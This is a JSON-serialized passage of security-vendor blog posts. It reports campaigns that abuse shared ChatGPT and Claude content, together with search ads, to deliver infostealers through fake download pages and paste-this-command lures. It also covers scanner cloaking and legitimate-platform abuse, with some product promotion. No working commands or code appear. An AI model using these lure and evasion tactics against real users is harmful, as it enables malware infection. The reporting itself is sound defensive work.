documentation.",{"data":3889,"content":3890,"nodeType":570},{},[3891],{"data":3892,"content":3893,"nodeType":455},{},[3894,3898,3906],{"data":3895,"marks":3896,"value":3897,"nodeType":448},{},[],"Three independent operators were ",{"data":3899,"content":3901,"nodeType":580},{"uri":3900},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F07\u002Fmisconfigured-server-reveals-three.html",[3902],{"data":3903,"marks":3904,"value":3905,"nodeType":448},{},[],"found running kits from public GitHub forks",{"data":3907,"marks":3908,"value":3909,"nodeType":448},{},[]," with minimal, AI-assisted customization: one had been operating for over a year with 218 victims across 12 countries, running infrastructure that would previously have required significantly more technical ability to maintain. ",{"data":3911,"content":3912,"nodeType":570},{},[3913],{"data":3914,"content":3915,"nodeType":455},{},[3916,3920,3928],{"data":3917,"marks":3918,"value":3919,"nodeType":448},{},[],"The tooling itself is starting to embed AI as a product feature — ",{"data":3921,"content":3923,"nodeType":580},{"uri":3922},"https:\u002F\u002Fwww.varonis.com\u002Fblog\u002Fdolphin-x-stealer",[3924],{"data":3925,"marks":3926,"value":3927,"nodeType":448},{},[],"Dolphin X",{"data":3929,"marks":3930,"value":3931,"nodeType":448},{},[],", a new MaaS infostealer targeting 300+ applications across browsers, password managers, cloud CLI tools, and crypto wallets, ships an AI Profiler that scores infected machines by application usage and installed software, then delivers daily ranked summaries so operators can prioritize high-value victims from thousands of infections.",{"data":3933,"content":3934,"nodeType":455},{},[3935,3939,3947,3951,3958,3962,3970],{"data":3936,"marks":3937,"value":3938,"nodeType":448},{},[],"AI adoption itself has also become an attack surface. Users searching for AI desktop applications are already looking to download and install software, and attackers are capitalizing on that behavior: a ",{"data":3940,"content":3942,"nodeType":580},{"uri":3941},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Ffakeagent-claude-desktop-malvertising-ends-in-dotnet-rat",[3943],{"data":3944,"marks":3945,"value":3946,"nodeType":448},{},[],"malicious Claude.ai Artifact impersonating a download portal",{"data":3948,"marks":3949,"value":3950,"nodeType":448},{},[]," drew 7,100 visits via Bing search ads and compromised 29 organizations in 48 hours, following the ",{"data":3952,"content":3953,"nodeType":580},{"uri":2228},[3954],{"data":3955,"marks":3956,"value":3957,"nodeType":448},{},[],"LLMShare attack pattern",{"data":3959,"marks":3960,"value":3961,"nodeType":448},{},[]," we documented in May. A second campaign, ",{"data":3963,"content":3965,"nodeType":580},{"uri":3964},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fmacsync-stealer-rat-reverse-engineering",[3966],{"data":3967,"marks":3968,"value":3969,"nodeType":448},{},[],"MacSync",{"data":3971,"marks":3972,"value":3973,"nodeType":448},{},[],", used a claude.ai conversation styled as an installation guide to deliver a macOS infostealer via a ClickFix-adjacent terminal paste, also distributed through Google Ads. In both cases, the AI platform's trusted domain carried the malicious content past URL reputation filters.",{"data":3975,"content":3976,"nodeType":519},{},[3977],{"data":3978,"marks":3979,"value":3981,"nodeType":448},{},[3980],{"type":452},"But the core techniques aren't changing",{"data":3983,"content":3984,"nodeType":455},{},[3985,3989,3997],{"data":3986,"marks":3987,"value":3988,"nodeType":448},{},[],"AI compresses the bottom layers of the ",{"data":3990,"content":3992,"nodeType":580},{"uri":3991},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fthe-pyramid-of-pain-in-the-ai-era\u002F",[3993],{"data":3994,"marks":3995,"value":3996,"nodeType":448},{},[],"Pyramid of Pain",{"data":3998,"marks":3999,"value":4000,"nodeType":448},{},[]," (unique hashes, domains, IP addresses, host artifacts) by enabling faster domain rotation, cheaper kit development, and rotating payloads, but the technique-level behaviors remain unchanged.",{"data":4002,"content":4003,"nodeType":455},{},[4004],{"data":4005,"marks":4006,"value":4007,"nodeType":448},{},[],"A phishing page still has to harvest credentials. Device code phishing still has to abuse the authorization grant. ClickFix still has to inject a clipboard payload. Those behavioral signatures are structurally resistant to AI-driven variation because changing them means changing how the attack works.",{"data":4009,"content":4010,"nodeType":515},{},[],{"data":4012,"content":4013,"nodeType":444},{},[4014],{"data":4015,"marks":4016,"value":4018,"nodeType":448},{},[4017],{"type":452},"What this means for defenders",{"data":4020,"content":4021,"nodeType":455},{},[4022],{"data":4023,"marks":4024,"value":4025,"nodeType":448},{},[],"Every trend documented here converges on the same control point: the browser. The AI acceleration that makes all of it faster and cheaper doesn't change where the attacks execute, or how Push intercepts them.",{"data":4027,"content":4028,"nodeType":566},{},[4029,4039,4049,4059],{"data":4030,"content":4031,"nodeType":570},{},[4032],{"data":4033,"content":4034,"nodeType":455},{},[4035],{"data":4036,"marks":4037,"value":4038,"nodeType":448},{},[],"For AiTM phishing, Push's behavioral detection analyzes and blocks the phishing page in real time, regardless of which domains or hosting infrastructure the kit uses on any given day.",{"data":4040,"content":4041,"nodeType":570},{},[4042],{"data":4043,"content":4044,"nodeType":455},{},[4045],{"data":4046,"marks":4047,"value":4048,"nodeType":448},{},[],"For device code phishing, Push detects both the phishing pages associated with device code kits and provides an additional layer on the legitimate device code authentication pages themselves, so users cannot enter attacker-supplied codes.",{"data":4050,"content":4051,"nodeType":570},{},[4052],{"data":4053,"content":4054,"nodeType":455},{},[4055],{"data":4056,"marks":4057,"value":4058,"nodeType":448},{},[],"For ClickFix, Push detects the clipboard injection at the moment the malicious payload is written.",{"data":4060,"content":4061,"nodeType":570},{},[4062],{"data":4063,"content":4064,"nodeType":455},{},[4065],{"data":4066,"marks":4067,"value":4068,"nodeType":448},{},[],"For OAuth supply chain attacks, Push monitors and controls consent flows at the browser layer, so security teams can govern which applications obtain tokens in the first place.",{"data":4070,"content":4071,"nodeType":455},{},[4072],{"data":4073,"marks":4074,"value":4075,"nodeType":448},{},[],"As AI enables more kits, more operators, and faster infrastructure rotation, indicator-based defenses that target domains, IPs, and hashes become less effective by the day. Behavioral detection that targets technique-class signatures (what the attack does) is the approach that scales.",{"data":4077,"content":4078,"nodeType":515},{},[],{"data":4080,"content":4081,"nodeType":455},{},[4082],{"data":4083,"marks":4084,"value":2765,"nodeType":448},{},[],{"data":4086,"content":4087,"nodeType":455},{},[4088],{"data":4089,"marks":4090,"value":2772,"nodeType":448},{},[],{"data":4092,"content":4093,"nodeType":455},{},[4094,4097,4106],{"data":4095,"marks":4096,"value":21,"nodeType":448},{},[],{"data":4098,"content":4100,"nodeType":580},{"uri":4099},"https:\u002F\u002Fpushsecurity.com\u002Fdemo\u002F",[4101],{"data":4102,"marks":4103,"value":4105,"nodeType":448},{},[4104],{"type":588},"Book a live demo to learn more.",{"data":4107,"marks":4108,"value":21,"nodeType":448},{},[],"Browser threat landscape: mid-year update 2026","PhaaS industrialization, Scattered Spider copycats, and AI-augmented tooling — what the threat landscape looks like in 2026 so far.","2026-08-10T00:00:00.000Z","browser-threat-landscape-mid-year-update-2026",{"items":4114},[4115,4117],{"sys":4116,"name":2803},{"id":2802},{"sys":4118,"name":2807},{"id":2806},{"items":4120},[4121],{"fullName":431,"firstName":432,"jobTitle":433,"profilePicture":4122},{"url":437},{"__typename":1924,"sys":4124,"content":4126,"title":4915,"synopsis":4916,"hashTags":60,"publishedDate":4917,"slug":4918,"tagsCollection":4919,"authorsCollection":4925},{"id":4125},"Gcg7PGuICrlRcqq1QFXxH",{"json":4127},{"data":4128,"content":4129,"nodeType":440},{},[4130,4137,4144,4175,4182,4188,4194,4206,4209,4217,4233,4240,4246,4253,4260,4266,4269,4277,4284,4290,4296,4303,4310,4328,4334,4337,4345,4363,4369,4376,4379,4387,4394,4401,4407,4413,4457,4464,4467,4475,4482,4489,4532,4539,4570,4577,4620,4627,4630,4638,4657,4664,4672,4688,4695,4714,4721,4724,4730,4736,4752,4755,4763,4782,4789,4909],{"data":4131,"content":4132,"nodeType":455},{},[4133],{"data":4134,"marks":4135,"value":4136,"nodeType":448},{},[],"Shared conversations on AI chatbot platforms have become the latest delivery mechanism for malware campaigns targeting macOS and Windows users. Attackers create content on platforms like ChatGPT and Claude that appears to offer installation guidance or service updates, then drive traffic to it via search engine results in the form of malvertising and SEO poisoning.  ",{"data":4138,"content":4139,"nodeType":455},{},[4140],{"data":4141,"marks":4142,"value":4143,"nodeType":448},{},[],"The content lives on chatgpt.com or claude.ai — domains that users and security tools trust implicitly — so the attack bypasses URL reputation checks before the victim even reaches the malicious payload.",{"data":4145,"content":4146,"nodeType":455},{},[4147,4151,4159,4163,4171],{"data":4148,"marks":4149,"value":4150,"nodeType":448},{},[],"Several variants of this technique have been ",{"data":4152,"content":4154,"nodeType":580},{"uri":4153},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-abuse-google-ads-claudeai-chats-to-push-mac-malware\u002F",[4155],{"data":4156,"marks":4157,"value":4158,"nodeType":448},{},[],"reported over the past few months",{"data":4160,"marks":4161,"value":4162,"nodeType":448},{},[],". The earliest examples used shared Claude.ai conversations disguised as installation guides — complete with fake \"Apple Support\" attribution — that walked users through opening a terminal and pasting a curl command that downloaded and executed an infostealer. ",{"data":4164,"content":4166,"nodeType":580},{"uri":4165},"https:\u002F\u002Fwww.kaspersky.com\u002Fblog\u002Fshare-chatgpt-chat-clickfix-macos-amos-infostealer\u002F54928\u002F",[4167],{"data":4168,"marks":4169,"value":4170,"nodeType":448},{},[],"Kaspersky documented a parallel campaign",{"data":4172,"marks":4173,"value":4174,"nodeType":448},{},[]," using shared ChatGPT conversations to deliver the AMOS (Atomic macOS Stealer) via the same paste-this-command social engineering pattern. ",{"data":4176,"content":4177,"nodeType":455},{},[4178],{"data":4179,"marks":4180,"value":4181,"nodeType":448},{},[],"Push has detected a new variant that goes beyond the previously reported technique of embedding terminal commands in shared conversations: the attacker has used ChatGPT's code rendering feature to build a fully designed fake page that mimics a ChatGPT service disruption, redirecting victims to a convincing clone of ChatGPT's download page that delivers a malicious executable. ",{"data":4183,"content":4187,"nodeType":499},{"target":4184},{"sys":4185},{"id":4186,"type":504,"linkType":505},"5lz9zt223pecGvdaqdvSTQ",[],{"data":4189,"content":4193,"nodeType":499},{"target":4190},{"sys":4191},{"id":4192,"type":504,"linkType":505},"51GomAj3VOjnbmgd1DWYu0",[],{"data":4195,"content":4196,"nodeType":455},{},[4197,4202],{"data":4198,"marks":4199,"value":4201,"nodeType":448},{},[4200],{"type":452},"This is a live campaign which is still generating detections across our customer base at the time of writing. ",{"data":4203,"marks":4204,"value":4205,"nodeType":448},{},[],"Push customers are already protected and do not need to take further action. The malicious page URLs can be found at the end of this report but are not exhaustive and are liable to change. ",{"data":4207,"content":4208,"nodeType":515},{},[],{"data":4210,"content":4211,"nodeType":444},{},[4212],{"data":4213,"marks":4214,"value":4216,"nodeType":448},{},[4215],{"type":452},"A fake page, not a fake conversation",{"data":4218,"content":4219,"nodeType":455},{},[4220,4224,4229],{"data":4221,"marks":4222,"value":4223,"nodeType":448},{},[],"Previously reported variants relied on shared ",{"data":4225,"marks":4226,"value":4228,"nodeType":448},{},[4227],{"type":1942},"conversations",{"data":4230,"marks":4231,"value":4232,"nodeType":448},{},[]," — the attacker created a chat that contained step-by-step instructions for the victim to follow, typically involving pasting a command into their terminal. The social engineering was conversational: the \"AI assistant\" appeared to be helpfully guiding the user through an installation process.",{"data":4234,"content":4235,"nodeType":455},{},[4236],{"data":4237,"marks":4238,"value":4239,"nodeType":448},{},[],"But now, rather than a shared conversation, the attacker has used ChatGPT's code rendering feature to create a fully designed, self-contained web page hosted at a chatgpt.com\u002Fs\u002F URL. It renders as what appears to be a ChatGPT service disruption notice:",{"data":4241,"content":4245,"nodeType":499},{"target":4242},{"sys":4243},{"id":4244,"type":504,"linkType":505},"1O9gyQab81SnbxhQp2aa5Z",[],{"data":4247,"content":4248,"nodeType":455},{},[4249],{"data":4250,"marks":4251,"value":4252,"nodeType":448},{},[],"A professional-looking error message reads: \"We're experiencing high traffic right now. Our website is temporarily unavailable due to a large number of users. Download our desktop app to continue.\" A prominent download button sits below.",{"data":4254,"content":4255,"nodeType":455},{},[4256],{"data":4257,"marks":4258,"value":4259,"nodeType":448},{},[],"The \"Show code\" toggle at the top of the page reveals what's actually happening — the entire thing is custom HTML and CSS, authored to mimic a ChatGPT system notice, rendered using ChatGPT's code output feature. A web page inside a web page, hosted on a domain that every URL reputation system in the world considers safe.",{"data":4261,"content":4265,"nodeType":499},{"target":4262},{"sys":4263},{"id":4264,"type":504,"linkType":505},"4kQTfxB3aVH9W9BeYOuljP",[],{"data":4267,"content":4268,"nodeType":515},{},[],{"data":4270,"content":4271,"nodeType":444},{},[4272],{"data":4273,"marks":4274,"value":4276,"nodeType":448},{},[4275],{"type":452},"The download page",{"data":4278,"content":4279,"nodeType":455},{},[4280],{"data":4281,"marks":4282,"value":4283,"nodeType":448},{},[],"Clicking the download button redirects the user to openew[.]app, which presents a convincing clone of ChatGPT's official desktop application download page — complete with OpenAI branding, macOS and Windows download buttons, a Chrome extension link, and a mobile download section.",{"data":4285,"content":4289,"nodeType":499},{"target":4286},{"sys":4287},{"id":4288,"type":504,"linkType":505},"4MdFc4OB37ZihTGx506QJ6",[],{"data":4291,"content":4295,"nodeType":499},{"target":4292},{"sys":4293},{"id":4294,"type":504,"linkType":505},"LaPUy0zpIeY8s4PF2wkat",[],{"data":4297,"content":4298,"nodeType":455},{},[4299],{"data":4300,"marks":4301,"value":4302,"nodeType":448},{},[],"The site also displays differently depending on who visits it. When Push researchers examined the URL via URLScan, the scanner was redirected to a different page entirely — a generic AR\u002FVR company website with no obvious connection to ChatGPT. ",{"data":4304,"content":4305,"nodeType":455},{},[4306],{"data":4307,"marks":4308,"value":4309,"nodeType":448},{},[],"Real users in a browser see the fake download page; automated scanners and bots see something benign. This kind of conditional rendering is a well-established evasion technique in the malvertising ecosystem, and it makes the malicious infrastructure harder for security teams and threat intelligence services to identify and analyze.",{"data":4311,"content":4312,"nodeType":455},{},[4313,4317,4325],{"data":4314,"marks":4315,"value":4316,"nodeType":448},{},[],"The downloaded executable poses as \"ChatGPT for Desktop\" and is ",{"data":4318,"content":4320,"nodeType":580},{"uri":4319},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fde8c50e8ccd240ef9d10ec26c26eeb37a4d1cad7c1e0edf3bb6e5689ec2dde78",[4321],{"data":4322,"marks":4323,"value":4324,"nodeType":448},{},[],"flagged on VirusTotal",{"data":4326,"marks":4327,"value":2375,"nodeType":448},{},[],{"data":4329,"content":4333,"nodeType":499},{"target":4330},{"sys":4331},{"id":4332,"type":504,"linkType":505},"3FSbwoFJYQrcyo9uMsQIWI",[],{"data":4335,"content":4336,"nodeType":515},{},[],{"data":4338,"content":4339,"nodeType":444},{},[4340],{"data":4341,"marks":4342,"value":4344,"nodeType":448},{},[4343],{"type":452},"The Claude variant: same campaign, different platform",{"data":4346,"content":4347,"nodeType":455},{},[4348,4352,4359],{"data":4349,"marks":4350,"value":4351,"nodeType":448},{},[],"Alongside the ChatGPT rendered-page variant, Push has also detected the previously reported style of attack using shared Claude.ai conversations. These follow the pattern documented by ",{"data":4353,"content":4354,"nodeType":580},{"uri":4153},[4355],{"data":4356,"marks":4357,"value":4358,"nodeType":448},{},[],"BleepingComputer",{"data":4360,"marks":4361,"value":4362,"nodeType":448},{},[],": a shared chat disguised as a \"Claude Code on Mac\" installation guide, attributed to \"Apple Support,\" containing a curl command that downloads and executes malware.",{"data":4364,"content":4368,"nodeType":499},{"target":4365},{"sys":4366},{"id":4367,"type":504,"linkType":505},"5sWayuTsVdiLSLoS4sv2Vc",[],{"data":4370,"content":4371,"nodeType":455},{},[4372],{"data":4373,"marks":4374,"value":4375,"nodeType":448},{},[],"The fact that both the ChatGPT and Claude variants are appearing in Push customer environments suggests a campaign — or at least a shared playbook — that is actively experimenting with different platforms and different social engineering approaches to find what converts best.",{"data":4377,"content":4378,"nodeType":515},{},[],{"data":4380,"content":4381,"nodeType":444},{},[4382],{"data":4383,"marks":4384,"value":4386,"nodeType":448},{},[4385],{"type":452},"Malvertising remains one of the top phishing delivery channels",{"data":4388,"content":4389,"nodeType":455},{},[4390],{"data":4391,"marks":4392,"value":4393,"nodeType":448},{},[],"Push has detected this variant across multiple customer environments, with users arriving at these shared chat URLs after searching for terms including \"chatgpt,\" \"chatgpt free,\" \"chat gpt,\" and common typos like \"chatgo,\" \"chatgot,\" and \"cvhatgpt.\" ",{"data":4395,"content":4396,"nodeType":455},{},[4397],{"data":4398,"marks":4399,"value":4400,"nodeType":448},{},[],"You can see an example of this below: it's incredibly convincing, and uses the real ChatGPT domain — so even users that are paying attention are liable to fall for it. ",{"data":4402,"content":4406,"nodeType":499},{"target":4403},{"sys":4404},{"id":4405,"type":504,"linkType":505},"1GYWOyHpZT1rdTm6IGOKu8",[],{"data":4408,"content":4412,"nodeType":499},{"target":4409},{"sys":4410},{"id":4411,"type":504,"linkType":505},"4HpFJRAZH2lbygaEk2xOnN",[],{"data":4414,"content":4415,"nodeType":455},{},[4416,4420,4428,4432,4440,4444,4453],{"data":4417,"marks":4418,"value":4419,"nodeType":448},{},[],"This fits a pattern Push has tracked extensively. ",{"data":4421,"content":4423,"nodeType":580},{"uri":4422},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fverizon-dbir-2026-review\u002F",[4424],{"data":4425,"marks":4426,"value":4427,"nodeType":448},{},[],"Search-based delivery is now the dominant channel for malware distribution",{"data":4429,"marks":4430,"value":4431,"nodeType":448},{},[]," — our own data shows that ClickFix attacks are reached via search results rather than email in 4 of 5 cases, and Push's own research into ",{"data":4433,"content":4435,"nodeType":580},{"uri":4434},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fanalysing-a-sophisticated-google-malvertising-attack\u002F",[4436],{"data":4437,"marks":4438,"value":4439,"nodeType":448},{},[],"malvertising campaigns impersonating brands like TradingView",{"data":4441,"marks":4442,"value":4443,"nodeType":448},{},[]," and ",{"data":4445,"content":4447,"nodeType":580},{"uri":4446},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fgoogle-search-malvertising-campaign-continues-now-impersonating-ahrefs\u002F",[4448],{"data":4449,"marks":4450,"value":4452,"nodeType":448},{},[4451],{"type":588},"Ahrefs",{"data":4454,"marks":4455,"value":4456,"nodeType":448},{},[]," has demonstrated how effectively search ads can funnel victims to malicious pages. ",{"data":4458,"content":4459,"nodeType":455},{},[4460],{"data":4461,"marks":4462,"value":4463,"nodeType":448},{},[],"The shared-chat technique adds a new dimension: the destination URL itself is genuine (chatgpt.com, claude.ai), which means even a cautious user who checks the URL before clicking will see nothing suspicious.",{"data":4465,"content":4466,"nodeType":515},{},[],{"data":4468,"content":4469,"nodeType":444},{},[4470],{"data":4471,"marks":4472,"value":4474,"nodeType":448},{},[4473],{"type":452},"Legitimate platform abuse is everywhere",{"data":4476,"content":4477,"nodeType":455},{},[4478],{"data":4479,"marks":4480,"value":4481,"nodeType":448},{},[],"This is one example of a much broader pattern that has become one of the defining characteristics of the 2026 threat landscape: attackers systematically abusing legitimate platforms as attack infrastructure. The scale and variety of this abuse in recent months alone is striking, and it spans every stage of the phishing chain.",{"data":4483,"content":4484,"nodeType":519},{},[4485],{"data":4486,"marks":4487,"value":4488,"nodeType":448},{},[],"Legit platform abuse for delivery",{"data":4490,"content":4491,"nodeType":455},{},[4492,4496,4504,4508,4516,4520,4528],{"data":4493,"marks":4494,"value":4495,"nodeType":448},{},[],"On the delivery side, attackers have been ",{"data":4497,"content":4499,"nodeType":580},{"uri":4498},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Famazon-ses-increasingly-abused-in-phishing-to-evade-detection\u002F",[4500],{"data":4501,"marks":4502,"value":4503,"nodeType":448},{},[],"weaponizing stolen AWS credentials to send phishing through Amazon SES",{"data":4505,"marks":4506,"value":4507,"nodeType":448},{},[]," that passes SPF, DKIM, and DMARC validation because SES is a legitimate Amazon service. A Vietnamese operation dubbed ",{"data":4509,"content":4511,"nodeType":580},{"uri":4510},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F05\u002F30000-facebook-accounts-hacked-via.html",[4512],{"data":4513,"marks":4514,"value":4515,"nodeType":448},{},[],"AccountDumpling used Google AppSheet's built-in email capability",{"data":4517,"marks":4518,"value":4519,"nodeType":448},{},[]," as a phishing relay to harvest 30,000 Facebook credentials. ",{"data":4521,"content":4523,"nodeType":580},{"uri":4522},"https:\u002F\u002Ftechcrunch.com\u002F2026\u002F05\u002F21\u002Fscammers-are-abusing-an-internal-microsoft-account-to-send-spam\u002F",[4524],{"data":4525,"marks":4526,"value":4527,"nodeType":448},{},[],"Scammers exploited Microsoft's own internal notification pipeline",{"data":4529,"marks":4530,"value":4531,"nodeType":448},{},[]," — sending phishing from the same msonlineservicesteam@microsoftonline.com address that delivers legitimate 2FA codes — with Spamhaus confirming months of ongoing abuse.",{"data":4533,"content":4534,"nodeType":519},{},[4535],{"data":4536,"marks":4537,"value":4538,"nodeType":448},{},[],"Legit platform abuse for hosting",{"data":4540,"content":4541,"nodeType":455},{},[4542,4546,4554,4558,4566],{"data":4543,"marks":4544,"value":4545,"nodeType":448},{},[],"For hosting, the platforms being abused read like a who's who of modern web infrastructure. ",{"data":4547,"content":4549,"nodeType":580},{"uri":4548},"https:\u002F\u002Fwww.securityweek.com\u002Fover-500-organizations-hit-in-years-long-phishing-campaign\u002F",[4550],{"data":4551,"marks":4552,"value":4553,"nodeType":448},{},[],"Operation HookedWing ran for four years",{"data":4555,"marks":4556,"value":4557,"nodeType":448},{},[]," on GitHub Pages and Vercel, compromising 500+ organizations across more than 100 GitHub Pages domains before anyone documented it publicly. Cofense has separately ",{"data":4559,"content":4561,"nodeType":580},{"uri":4560},"https:\u002F\u002Fcofense.com\u002Fblog\u002Fsteal-smarter-not-harder-malicious-use-of-vercel-for-credential-phishing\u002F",[4562],{"data":4563,"marks":4564,"value":4565,"nodeType":448},{},[],"documented the growing abuse of Vercel",{"data":4567,"marks":4568,"value":4569,"nodeType":448},{},[]," for credential phishing hosting. Pixm's Q1 2026 phishing report tracked over 100 unique Azure Blob Storage subdomain variants hosting phishing content that carried Microsoft's own domain reputation, alongside abuse of Cloudflare CDN, Cloudflare Workers, Cloudflare R2, Backblaze B2, and Supabase. ",{"data":4571,"content":4572,"nodeType":519},{},[4573],{"data":4574,"marks":4575,"value":4576,"nodeType":448},{},[],"Abuse of compromised websites that are otherwise legit",{"data":4578,"content":4579,"nodeType":455},{},[4580,4584,4592,4596,4604,4608,4616],{"data":4581,"marks":4582,"value":4583,"nodeType":448},{},[],"Compromised legitimate sites are also being repurposed at scale. A mass exploitation of a ",{"data":4585,"content":4587,"nodeType":580},{"uri":4586},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign\u002F",[4588],{"data":4589,"marks":4590,"value":4591,"nodeType":448},{},[],"Ghost CMS vulnerability planted ClickFix pages across 700+ websites",{"data":4593,"marks":4594,"value":4595,"nodeType":448},{},[]," including Harvard, Oxford, and DuckDuckGo subdomains. Microsoft recently documented a campaign where ",{"data":4597,"content":4599,"nodeType":580},{"uri":4598},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2026\u002F05\u002F26\u002Fpoisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities\u002F",[4600],{"data":4601,"marks":4602,"value":4603,"nodeType":448},{},[],"SEO poisoning was combined with AI chatbot recommendation manipulation",{"data":4605,"marks":4606,"value":4607,"nodeType":448},{},[]," to deliver GPU mining malware — extending the poisoning from traditional search results into AI-generated software recommendations. And ",{"data":4609,"content":4611,"nodeType":580},{"uri":4610},"https:\u002F\u002Fwww.helpnetsecurity.com\u002F2026\u002F05\u002F27\u002Fdeno-rat-malware-fake-chatgpt-claude-installers\u002F",[4612],{"data":4613,"marks":4614,"value":4615,"nodeType":448},{},[],"fake ChatGPT and Claude installers on GitHub and SourceForge",{"data":4617,"marks":4618,"value":4619,"nodeType":448},{},[]," have been delivering the DinDoor backdoor and a Deno-based RAT via repositories that mimic legitimate developer tool distributions.",{"data":4621,"content":4622,"nodeType":455},{},[4623],{"data":4624,"marks":4625,"value":4626,"nodeType":448},{},[],"The structural problem is that every one of these platforms is genuinely legitimate, and the security controls that evaluate them — domain reputation, email authentication, URL categorization — confirm them as trusted because they are trusted. This attack extends this pattern into new territory by weaponizing the content-sharing features of AI chatbot platforms specifically, but the underlying principles are the same. ",{"data":4628,"content":4629,"nodeType":515},{},[],{"data":4631,"content":4632,"nodeType":444},{},[4633],{"data":4634,"marks":4635,"value":4637,"nodeType":448},{},[4636],{"type":452},"Impact analysis",{"data":4639,"content":4640,"nodeType":455},{},[4641,4645,4653],{"data":4642,"marks":4643,"value":4644,"nodeType":448},{},[],"Shared-chat malware delivery exploits a structural property of AI platforms that traditional security controls aren't designed to handle. Domain reputation, URL categorization, and safe browsing databases all treat chatgpt.com and claude.ai as trusted — because they are. Using these trusted pages to link off to further convincing-looking pages hosting malware allows the attacker to run campaigns that blend in, as well as rotate the phishing delivery pages later in the chain should they ever be flagged, allowing the campaign to continue without interruption (a well known ",{"data":4646,"content":4648,"nodeType":580},{"uri":4647},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002F",[4649],{"data":4650,"marks":4651,"value":4652,"nodeType":448},{},[],"detection evasion technique",{"data":4654,"marks":4655,"value":4656,"nodeType":448},{},[],"). ",{"data":4658,"content":4659,"nodeType":455},{},[4660],{"data":4661,"marks":4662,"value":4663,"nodeType":448},{},[],"What makes the rendered-page variant particularly concerning is that it eliminates the most obvious red flag in the earlier attacks. The Claude.ai conversation variants required the victim to recognize that a shared chat instructing them to paste terminal commands might be suspicious — a tall order for many users, but at least the attack surface was visible. The rendered-page variant shows nothing that looks like an attack. It presents what appears to be a routine service disruption with a reasonable call to action: download the desktop app to continue using ChatGPT. ",{"data":4665,"content":4666,"nodeType":519},{},[4667],{"data":4668,"marks":4669,"value":4671,"nodeType":448},{},[4670],{"type":452},"How Push detected the attack",{"data":4673,"content":4674,"nodeType":455},{},[4675,4679,4684],{"data":4676,"marks":4677,"value":4678,"nodeType":448},{},[],"We've aligned our detection logic for this technique under the name ",{"data":4680,"marks":4681,"value":4683,"nodeType":448},{},[4682],{"type":452},"LLMShare",{"data":4685,"marks":4686,"value":4687,"nodeType":448},{},[]," — a technique-level detection that covers shared content abuse across LLM platforms, not tied to any single campaign or set of IOCs. ",{"data":4689,"content":4690,"nodeType":455},{},[4691],{"data":4692,"marks":4693,"value":4694,"nodeType":448},{},[],"Because Push sees the full context of how a user arrived at a page and what that page does once it renders, we can identify LLMShare attacks regardless of which AI platform is being abused or what social engineering wrapper the attacker has chosen. ",{"data":4696,"content":4697,"nodeType":455},{},[4698,4702,4710],{"data":4699,"marks":4700,"value":4701,"nodeType":448},{},[],"When we identified the initial instances of this campaign, we used our ",{"data":4703,"content":4705,"nodeType":580},{"uri":4704},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fcan-ai-replace-a-threat-researcher-what-we-learned-building-an-agentic-threat-hunting-pipeline\u002F",[4706],{"data":4707,"marks":4708,"value":4709,"nodeType":448},{},[],"agentic threat hunting pipeline",{"data":4711,"marks":4712,"value":4713,"nodeType":448},{},[]," to hunt for additional examples across our customer telemetry, develop the LLMShare detection, and rapidly deploy it to customers. Push blocks users from interacting with the page before any malicious activity can occur. ",{"data":4715,"content":4716,"nodeType":455},{},[4717],{"data":4718,"marks":4719,"value":4720,"nodeType":448},{},[],"Push customers do not need to take any further action.",{"data":4722,"content":4723,"nodeType":515},{},[],{"data":4725,"content":4726,"nodeType":455},{},[4727],{"data":4728,"marks":4729,"value":2765,"nodeType":448},{},[],{"data":4731,"content":4732,"nodeType":455},{},[4733],{"data":4734,"marks":4735,"value":2772,"nodeType":448},{},[],{"data":4737,"content":4738,"nodeType":455},{},[4739,4742,4749],{"data":4740,"marks":4741,"value":21,"nodeType":448},{},[],{"data":4743,"content":4744,"nodeType":580},{"uri":4099},[4745],{"data":4746,"marks":4747,"value":4105,"nodeType":448},{},[4748],{"type":588},{"data":4750,"marks":4751,"value":21,"nodeType":448},{},[],{"data":4753,"content":4754,"nodeType":515},{},[],{"data":4756,"content":4757,"nodeType":444},{},[4758],{"data":4759,"marks":4760,"value":4762,"nodeType":448},{},[4761],{"type":452},"Indicators of compromise",{"data":4764,"content":4765,"nodeType":455},{},[4766,4770,4778],{"data":4767,"marks":4768,"value":4769,"nodeType":448},{},[],"As we always say, short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",{"data":4771,"content":4773,"nodeType":580},{"uri":4772},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002Ftechniques\u002Fdomain-rotation-redirection\u002F",[4774],{"data":4775,"marks":4776,"value":4777,"nodeType":448},{},[],"quickly spin up and rotate the sites used",{"data":4779,"marks":4780,"value":4781,"nodeType":448},{},[]," in the attack chain. IoC-based detections for campaigns like this are of limited value.",{"data":4783,"content":4784,"nodeType":455},{},[4785],{"data":4786,"marks":4787,"value":4788,"nodeType":448},{},[],"At the time of writing, the indicators observed 